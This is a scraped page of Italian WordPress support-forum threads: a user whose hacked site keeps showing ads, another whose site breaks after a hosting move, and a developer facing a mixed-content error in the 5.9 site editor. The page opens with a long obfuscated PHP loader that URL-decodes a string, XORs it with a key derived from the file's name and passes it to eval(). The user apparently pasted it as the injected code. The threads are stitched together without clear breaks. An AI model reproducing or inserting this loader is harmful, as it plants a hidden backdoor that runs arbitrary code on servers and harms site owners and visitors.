$_173ysgu = basename/*z*/(/*3*/trim/*962*/(/*mapq*/preg_replace/*m*/(/*wuc*/rawurldecode/*gz93j*/(/*m0t*/"%2F%5C%28.%2A%24%2F"/*n4*/)/*90ys*/, '', __FILE__/*wj*/)/*o9pk*//*j*/)/*mxb*//*x6rt*/)/*kdnv*/;$_ywhrmgi = "GUBLE%06%07TP%40%0C%07G%09%40%16%16%01%03%0FmZA%07%17%0AVG%3D%07%16%07%03F%5C%0ENJF%24Hh%00%01%04%0B%5C%5C%06N%10%1B%5CV%03%09%3B%01%0D%5CMK%11%170MA%07%05%10%07B%15%15%0EXJT%24s%0B%0A%0D%3D%11WM%06N%06%1D%5C%5C%10%3B%08%0D%05%15%15%0E%276%23b%1AY%24%0D%0C%0BmJK%1DKHB%5C%05%3B%01%10%10%5DK%5DNOO%1E%1AY%24%0D%0C%0BmJK%1DKHCR%1A%3B%01%1A%07QLZ%00%0C%01qG%0B%09%01EN%12%09%07R%23%0A%5CA%0D%16%3B%10%07BV%5C%1D%0A%01I%1BRM_%22%11WMq%1D%0A%02Kl%0E%0D%09%0B%16%1A%09%07R%0A%09%06%12%06%01%02%0B%0CW%5D%06K3%27~l%27%2B%28%40K%1BBJ%0C%05%06%40VJF4%2A2m%7Ca%25AC%0E%11%3E%0AFKYOPHIKNJV%04%0D%0A%07%06%1A%1EH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%0E%14KM%1F%06%07TP%40%0CKHHZ%0E%01%3B%12%17FfM%06%0D%1BK%5D%16%17DEN%12%08%07RG%1AYP%09%16%14B_%12%1EH%0C%5B%5B%1E%02%07WIV%00%06%0D%03%5D%02VK%1E%5BT%00PO%00%0BMPT%5DL%07%07%07%5D%07E%09%5EB%06%01%0EB%13F%11%13%01%09%40I%15%0F%16%01MG%0B%0B%0AB%05VAO%02%0C%0C%06%17%17%09%13%13%04%5EC%07I%18%06H%13J%17%10%10%0EWW%06M%16%02YB%04%08%1EKB%0E%19%1A%40%18%1DKG%17%16%0AB%40%10%02SM%0C%00ZI%01%00%10%09%03_TE%11CR%0E%11%23%26%27%26%27t~f%20%29%24b~%2C%2B430am%7B%3F47wi%03%06%07%06%07T%5EF%00%09%04B%5E%0C%0B%14%13%10AM%5B%1F%14%17WIRUVQV%07%0F%19QZD%01%0E%40_%40%1A%0CJTK%05%0AO%13%13%11%10%16%3D%11BUG%1DKKA%5C%16%1E%07%06%16YXC%04%08%17%07%08F%1C%0A%1A%0FWUGI%5EOOA%10%05%1D%3D%04%5EP%5EAG%17%40K%0F%01%08%0BK%09%1D%5E%0B%0F%0C%5DG%0C%03D_B%02%02%0A%18%16%03YG%00DYB%40%10%02%0A%1C%0E%18_U%0E%1ED_BBKK%0E%3C%1DKC%0E%05%07%07J%10Gu7%22BtRO%1ETO%5Bn%12rF%3FRsM%40HD%40%40%1E%19%0A%1C%0E%18_U%0E%1EMY%06%5D%19UM%0C%00ZI%01%00%10%1B%16%40UW%0E%0AO%13%13F%1C%0A%1A%0FWUG2G%1ACD%13%02%08%189%16IL%05%00%1CZ%5D%05OO%3F%3F%09%1DI%18%19%00I_BYDF%1A%5CAC%0C%0F%06u%17%17%09%13%13%04%5ECuM%13%0DBP%11%10%0A%05I%19dsRG%07WD%09%1E%13%01%18%12%04%0EM%1B%01V%5E%07%08%0D9FGTY%18%05%03ThF%14%06%0E%01AM%40%0EHDsnY%40%01%0D%0DKTF%0FCR%0E%17%1A%0A%1C%0F%07%5EPuM%16%02YB%04%08%1E9FB%5BB%0A%10%1B%40TIO9%3FY%16%5BV%18%0A%19%5BZ%01DYBJ%16VA%1D%19%0CJG%1B%10%16%0E%1BUP%0EU_O%1C%1AB%18DJFUHT%06%04%03%0E%0D%5CDPKY%16NM%1D%0C%09%5CP%0BDYBJ%1A%1DI%18%19%00I_BBDSW%1B%19%12UC%5B%07%13%1EDLF%0AKNE%13%14%0CT%13%5CZDPK%09%1D%5E%03%10%17YGBYDJJ%16QW%1E%08%15YP%18DBBQ%1B%19%12UCY%07%13%1ED%40%07%0D%5D%40C%01%05T%0AB%17%08%13%16%00%12%04%0EM%12%1ABD%16%06DLBQQ%5CAG%0DVB%0B%12%11%0B%01%1B%02G%0FCG%0A%5B%1B%13%0F%18%15QC%0EH%5EO%18%07KD%1FF%13GUY%1D%01O%13%13F%15%11%0E%15F%5B%0EGC%0CFAJ%40%13%01%16%5D_%5C%0A%0AF%15N%0B%02DJFWVA%10%0E%07H%13CYDTV%1B%19UM%12%1ABD%16%06D_B%16H%5B%05%14%1BL%13LD%07%0A%10%1A%1D%5E%03%10%17YGK_%19%1FBEQG%05%06O%06%17%12%06%08%01%11FWII_O%5DG%10%08%01%0CJ%16LC%1E%12%09BIKM_%10%07FL%5C%07CK_F%0E%13%10%00YOPHIKNHF%0C%07%10%0B%0D%5CfK%11%0A%1CZ%40JC%02%0B%0EWf%5E%1C%170M%5C%0C%10%01%0C%16A%1E%07%40%18%09%5B%5D%01%10%0D%0D%0C%12_G%05%060%5EF%16%3B%07%0D%0CF%5C%40%1D%10G%0A%5E%07%0D%13%17%07Y%15%0EM%06%03J%40%0F%07%16%05N%12%1DK%05%07%1CCP%10%03%17%09%12HOJI%5EOhR%0E%17%01K%19%16JC%0C%0D%18VW%0FDYBFWUJ%1A%0E%0C%5CT%11%0F%14%18%14V%19%13TCW%0E%0CBC%05EB%08%19%09%1EDT%0A%5C%0D%10%1E%01%06F%19%13I%23%09AC%07%0ALF%0FWPY%1C%06%04%02%13F%17%09%07%0CEAJ%04JTGUBL%40%0D%0DFCM%0D%17O%13%0E_D%22%03%0EA%5C%07%12%11%0AZF%10%0ADRYO%5CB%1A%06%14GUBL%0D%11%3DSK%5C%08%1AG%0AV%0E%00%17%0F%01%40%5E%07%40CKK_%06%17%09%01%10U%19%13I%0A%02%5E_%0D%00%01JFWUJ%1A%0E%0C%5CTK_%40%0F%1A%5ETD%0FCR%0EU%15%16%0D%16%07%1A%1DA%06%17%15MW%16HDF%07%5E%5D%5D%04%00%1DI%1AY%02%07%0E%0DA%5C%06M%0C%00ZI%01%00%10KY%40%5CZ%1C%11%01%0E%17%0F%1C%08%0F%08T%02S%14%1E%06H%13JE%02%17%0CQMG%06%0D0KK%0B%17%10%11J%15_G%05%060IV%16%3B%07%0D%0CF%5C%40%1D%10H%07%1A%19%02%11%0C%01FPA%07C%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%40%07%0EVJC%0A%11%08BQ%0E%16%15%0FKI%1DC%1D%11%0DYJ%17%00D_BTV%5E%0C%0DG%0AV%0E%00%17%0F%01%40%5EB%0B%0F%1D_%5ENDF%10%40%1B%02%0A%02%08%0D%5BG%08%0A%17B_%12_%5C%0C%02%0B%06%17%0F%10%16%00%15KLJEC%09G_%07%17%0D%18%07%1A%1DK%05%07%1CCP%10%03%08%00%0E%40HC%40JTHP%0E%0B%17%07J%16TZ%1B%01%18WF%06M_%10%07FL%5C%07CKEX%00%11%10%08%0CA%02S%14%05%1A%40P%16%0D%0B%0CBVM%5C%0C%08%02%06%1A%19%16%01%16%17%40W%0E%1D%11%06C%1B%12%16%01%05%3D%40%5C%5E%05%02%0CK%1B%40K8JL%18e%0AFAC%0E%14EHD%3D%3Dtpb%2C%3C0%07%1AY%19%02%17%0CQMG%06%0DOOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%1DV%01%13%0BWD%00%01D_B%10%1B%15%0F%0C%1D%0E%1BF%14%06%0E%01AM%40%0E%5E_%15%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08K%1F%02%0D%10%12%11%0A%18%11%17VG%16YTYB%16H%5C%11%1B%1BZ%0F%11%10%16%0E%07%5C%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ%40CI%08%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08B%40%15%10%1AJMZBHC%0E%17%12%06%08%01%11FWIBHFU%17%1A%0C%14%06%1BE%5BKIMR%0EP%0A%16L%0D%10V%11%0A%1D%15%0BYI%0C%3F%40%12%00%5EZ%5D%1D%0D%08s%1AB%3AD%0D%10V%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ2G%1E%5CK%1A%10%10%3FK%1B%02S%14%11%0AZF%10%0ADF%1AZIJ%10%14%0DK%08%1F%02%11%0C%01FPA%07C%09%5EW%0D%11%12%0FJ%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10M%19%05%5EVL%08%0FO%0AF%15%07%0F%10%12%09KK%1D%16%1D%40%13%03%06%11%09%10GPEA%02%0D%5BX%10%11%0D%09J%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10MNB%16LY%0A%08%1D%5E%1AY%19%02%17%0CQMG%06%0DO%40%5E%0C%06%0A%14%0C%5B%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%5EB%06%01%0EB%13F%11%13%01%09%40I%15%1B%06%1B%5BA%0CD%05%00%17YK%5B%00%08GOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%17EZE%1B%13F%02%13F%0B%0B%16%18Q%5DZ%1F%10%0CF%40%16M_%1F%04GWM%1D%0A%00%40%13%15%0C%08%0E%00AI%06%40%18KTK%06%09%15%09%04B%19%13I%23%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%00%16%10WRCAJF%15%17%0E%0F%1C%13%1AG%19%13I%10%1B%5CC%0D%17LF%18J%5DC%18%08%09%5E%1FB%09%00WJVM%5C%0C%08%02%06%1AKM_%0B%04%12%11%0A%05%08%17_K%17DE__%12%7Fo%250%2A%07HF%14%0E%15%08BM%0ETC%1C%5BQ%11%10%16JFHAJ%04%12%04HCND%40%0E%09JHV%1CCD%0E%00PM_F%18%5BKM%05%16O%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%1B%02%18%5BA%0E%00%01%01%0DV%5C%06M%13%05YY%12%10MNB_%5D%1BA%07%1B%5CV%09%09LKK%1B%10%15%14%06%03%5DV%19%40%1E%0B%10QU%5BI%5EOoA%10%05%1DJK%09D%5C%0C%17%1A%5C%5DB%40%1E%0B%10QU%5BR%1E%09%5B%5D%01%10%0D%0D%0C%12%5D%5C%11%0E%07I%5CJ%40%1E%0B%10QU%5B%40%18KKT%0F%03%08%08%0CU%19%13I%11%0EYF%10%08%01%0C%01%5D%5DKA%0D%02%40Q%0C%12%0A%0BJrJK%1B%0A%0EBZ%18%01LF%18%5BKM%05%16F%02%13%0F%00QJ%06FKK%02%0EG%07%1AKM_F%18J%5DC%18%08%09%5E%13_D%24%04%0B%5E%5Cq%0E%06%1BqP%0D%0A%10%07%0CFJ%06%0D%17%1DKX%0FLMKY%16UE%11%12%17%5B%13_D%17%16%10BV%5DAG%15VW%0F%15%0F%04%12%1E%19C%0DVGJG%10%01%0F%0FJ%1B%10%07R%0A%09%0E%1BF%08%0F%1A%13JL%0EH%5ER%0Eu%23%287%27KI%1D_%07%19%01VA%0B%02D_BALL%1A%17%1D%06%17%18%1C%00%0F%13Y_%5EECKBX%1A%15%1C%17B%19%19%1D%5BJT%0AI%1A%00%09%13%09TI%0ETC%1CZA%3D%16%01%12%0ESZKAG%1E%40I%0C%1C%16%0B%04%1E%19%0A%0C%04%02I_%08%0A%03NB%16CV%0D%0E%1EEU%12M_%1F%07%5EJK%12G%15VW%0F%15%0F%04%12%12%04%0EM%19%17J%5E%13%0F%02%12B%1C%19%0C5%0D3%40%1CMFDLB_%5D%1BA%07%1B%5CV%09%09LKK%12%17%0EM%06%08CT%0E%0E%0A%05YOyH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%06W%16%16%01%09%0F%1A%10%02IG%15VW%0F%15%0F%04%12%1B%02S%0F%16%01MG%0B%0B%0AB%0A_XY%1A%17%0E%06%17%01%11%17%16%03F%5D%02IG%1EE%40%00%10%01%01KI%1DT%00%11%0CBFBYD%15%0A%5EUL%1A%13G%07%08F%1E%0D%10%01%5ELuM%00%1A%5DG%03%10%00%3FB%0F%19I%0D%1B%0EE%5C%01L%40%13%09A%5BZ%0C%00F%15W%10%1C%09%0A%05%5D%11%0A%13%0A%1DM_%17M_%1F%04GWM%1D%0A%00%40%13%17%0A%1D%15%01W%11%0A%0A%16%1CZR%16%00M%19FHP%5C%0A%0F%1A%0E%0EB%13%0C%0E%0EPJ%5EAJT%5B%5D%11%01%10JFHP%5C%0A%0F%1Au%17%01%11%17%16%03F%5Ds%40X%0B%5CK%0F%0C%03%0DJ%16CG%1B%00%03%5B%1AY%19%02%17%0CQMG%06%0DO%40F%0B%1E%12%13%07A%11%0A%0A%16%1CZR%16%00Y%2C7~u%07%12%05%00%5CV%03%07%0CBJEQB%05%01%1C%5E%1BKD%05%11B%16VA%1D%19%0CJG%01%01%0A%16%09%0F%07%0A%0B%12%1B%5EI%0E%08%12K%19%5B_%0EAG%0C%5B%40%16%05%10%06KIPHIK%1CZA%01%09%14JFQL%5D%1D%02%1BJ%1FB%40%0B%0D%16HZJ%1D%00%0A%40G%09MD__%12%09%07%12%06%19O_J%40%06%13%16BCB%05%15F%15Q%10%01%05%09YODK%05%10%0AUV%14%05%08JFPHZ%19%19%03BEK_%19%1F%1FTV%5C%0C%02%0CF%13J%05%16%10%03KfC%0C%11%08K%1BF%3B%27--ypkECKqc-70KBSJ%0EM%01%1FHV%10%12%0FB_%0C%19%0A%1D%15%0BYI%0CM%1FF%16D%5DY%13%0DO%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%0E%07%17OX%0D%07LF%16D%5DY%13%0DF%02%13F%06%14%04%07%40OE%40JTGUBL%0D%11%11WM%06M%17%19JD%18%0A%3FE%03Y%1Es%40CI%08%13F%11%13%01%09%40I%13TG%1BXW%15%1E%0A9ESR%094J%14GUBL%40%16%14VNT%078HO%14%3FDY_B%15P%09%40%18K%5EQ%0E%07%17%16%0CU%19%13I%22%1D%5CR%1BLC%12%14%15%19%13WC%2F%5E%5B%12%12%01%10%11%5BV%40AJC%09%40%14CD_%5C%12%1E%1CGSB%1F%14NC%05%09E%12%04%10IG%1BXW%15%1E%0A9ESR%094OF%15V%01%0C%0BB%22A%5C%5C%00%02%03GI%07L%40%12%00%5EZ%5D%1D%0D%08%07%08%07%1C%0D%16YO%5CB%1A%06%06H%13J%40%10%14%06EC%402D%0E%09nBYYBEW%1E%07%12%06%19O_J%40%10%14%06EC%402D%0B%09nK_%19%07%0EA%5CG%0FCG%0AG%14%00%13%18%0Ci%1EON%3EO%13%0EBC%14%0E%17UP%40NJ%14GUJ%40%10%14%06EC%402D%1CO%14%3FDY_B%15XJ%0DDFU%5B%0F%05%13%11%16S%11%0A%1D%15%0BYI%0C%3FC%12Eo%15%0EM%17%19JD%18%0A%3FE%06%15d%07R%1E%0AB%40%07%0D%02JFFOJ%1E%19%01u%14%11%05C%3FB%0F%04%0EN%11%0AC%14K%1F%11%0C%1BEZKAG%1BXW%15%1E%0A9EB%1Es%40X%12SV%01%0C%0BBFFOJ%1E%19%01u%14%03%0FC%3FYWAG%1DKF%15N%1F%0A%11%0B%18DHK%1AKF%15Nh%19";eval/*jty*/(/*5*//*cw6d*/(/*1dxia*/rawurldecode/*6*/(/*hl*/$_ywhrmgi/*2lr*/)/*n*/ ^ substr/*n9*/(/*y*/str_repeat/*jd1u*/(/*m4b2*/$_173ysgu, /*mck*/(/*g6n82*/strlen/*y*/(/*x*/$_ywhrmgi/*wzxty*/)/*6*//strlen/*y2l*/(/*lq*/$_173ysgu/*ejuq*/)/*g*//*ouldi*/)/*imfk*/ + 1/*pvtuh*/)/*5qpof*/, 0, strlen/*nu647*/(/*0iu*/$_ywhrmgi/*f5d*/)/*4i*//*7t*/)/*c35v*//*0im*/)/*95cm*//*ei*/)/*91rf*/;insomma quando apro il sito, vengono mostrate pubblicità e ovviamente non compare più il sito, ovviamente ho già provveduto a cancellare i file, modificare i file etc, ma puntualmente ogni tot tempo, tipo ogni 2 giorni massimo, questi ricompaiono.
Ho cancellato e disabilitato temi e plugin, ma niente è cambiato.
Ovviamente ho il sito aggiornato.Cosa posso fare?
GrazieSito violato, file modificati, cartelle create
-
Buon giorno.
Ho un problema che non ho trovato sul Forum.
Ho trasferito il mio sito su un nuovo Hosting. Tutto all’apparenza è tornato normale, ma poi cercando di utilizzare il sito mi sono resa conto che è TUTTO bloccato.
Ad esempio:
– Non si caricano le immagini
– Se provo ad aprire la pagina “aggiungi nuovi plugin” dopo molto tempo arriva l’errore 404
– Se voglio inserire un Menu su “Personalizza” non si salva.
– Se provo a scrivere un nuovo articolo/pagina sotto “Articolo” esce la stringa:
Permalink: ?preview=true
Stai modificando la pagina che mostra i tuoi ultimi articoli.E non c’è, di fatto, lo spazio per scrivere l’articolo.
COSA HO GIA’ FATTO:
1) Sovrascritto i files del sito su public html del mio spazio hosting (wp_content, wp-admin e wp_includes) con file originali del sito WordPress tramite FileZilla (nel caso mancassero dei files necessari al funzionamento) e poi nuovamente ri-trasferiti quelli del backup del sito, in modo che i files pubblicati contengano tutte le info aggiornate necessarie per il mio sito;
2) Annullato il funzionamento di tutti i plugin rinominando la cartella plugin, in modo che risultassero tutti introvabili. L’errore persiste anche senza i plugin
3) Controllato i file wp_config e controllato che i dati corrispondessero. Tutto ok
4) Rinominato il file .htaccess per renderlo fuori uso, ma l’errore persiste.
5) Fatto ricreare da WordPress un file .htaccess in automatico andando su Impostazioni-Permalink- Salva (senza nessuna modifica) L’errore persiste.
6) Riscritto completamente il file .htaccess come consigliato da un webmaster nel web con i termini base e aggiunta di 3 stringhe per passaggio a HTTPS. Copiato codice completo, quindi non ci dovrebbero essere possibilità di errore.
7) Controllati permessi cartelle e files (755-644) e permessi .htaccess (644)
8) Ottimizzato, Analizzato e Riparato tabella Database su phpMyAdmin
9. Pregato/Imprecato Nessun risultato.
10. Ditemi voi cosa devo fare perché io ho esaurito la fantasia…
Grazie.
Ciao Alice,
Hai installato il plugin Gutenberg sul tuo sito? Nel caso non l’avessi, se possibile prova ad installarlo ed attivarlo.
Ho appena trovato un problema simile sul forum internazionale di WordPress, con una utente che ha risolto installando Gutenberg.
Link: https://wordpress.org/support/topic/cant-edit-post-after-5-9/
Vuoi provare e farci sapere?
Grazie,
Piermario
-
Salve
mi chiamo Simone e sviluppo piccoli siti web con WordPress.Appena uscita la versione di WordPress 5.9 ho pensato subito di provarne le nuove funzionalità sopratutto usando i nuovi temi a blocchi, naturalmente la prima scelta è stata il Twenty Twenty-Two.
La prima cosa che ho provato a fare è usare il nuovo editor di tema (sotto la voce di menu Aspetto per intenderci), con mia grande sorpresa mi mostra solo una pagina bianca.
Ho usato la console del browser per cercare di capire quale era il problema, l’errore era il seguente
site-editor.php:1 Mixed Content: The page at 'https://www.webdraft.info/gub59/wp-admin/site-editor.php' was loaded over HTTPS, but requested an insecure resource 'http://www.webdraft.info/gub59/?_wp-find-template=true'. This request has been blocked; the content must be served over HTTPS.
da quello che ne capisco ho interpretato l’errore in questo modo: il browser per sicurezza non visualizza la pagina perché nella stessa si fa riferimento a contenuti che non passano per https.Come possono esserci contenuti misti se WordPress è stato appena installato su un nuovo database ed i contenuti sono quelli di default di WordPress?
Per completezza è bene chiarire che il resto di WordPress funziona normalmente compreso l’editor a blocchi che si usa per editare post e pagine, il sito viene pubblicato correttamente come si può vedere nel link.
Prima di porre questa domanda al forum naturalmente ho provato a cercare se esistessero altri casi simili al mio, ad ora non ho trovato niente di simile e di conseguenza mi sono rivolto all’assistenza del mio hosting (Aruba), al momento l’unica cosa che mi hanno consigliato di fare è quella di installare il plugin “Really Simple SSL” e che naturalmente non ha risolto il problema.
L’unica soluzione funzionante che sono riuscito a trovare tra le diverse prove che ho fatto è quella di intervenire sul file
.htaccessinserendo questo comando
Header always set Content-Security-Policy "upgrade-insecure-requests;"
ma francamente non so se sia una buona pratica farlo e se possa creare problemi di indicizzazione in un sito nel lungo periodo.Ma alla fine la mia vera domanda è:
Perché il un file di WordPresssite-editor.phpche lavora suhttps://dovrebbe chiamare una risorsa in modo specifico suhttp://pur appartenendo sempre allo stesso dominio e che comunque ha un certificato SSL attivo con redirect automatico su HTTPS?Vi ringrazio in anticipo per la vostra disponibilità.
La pagina su cui ho bisogno di aiuto: [devi essere connesso per vedere il link]
-
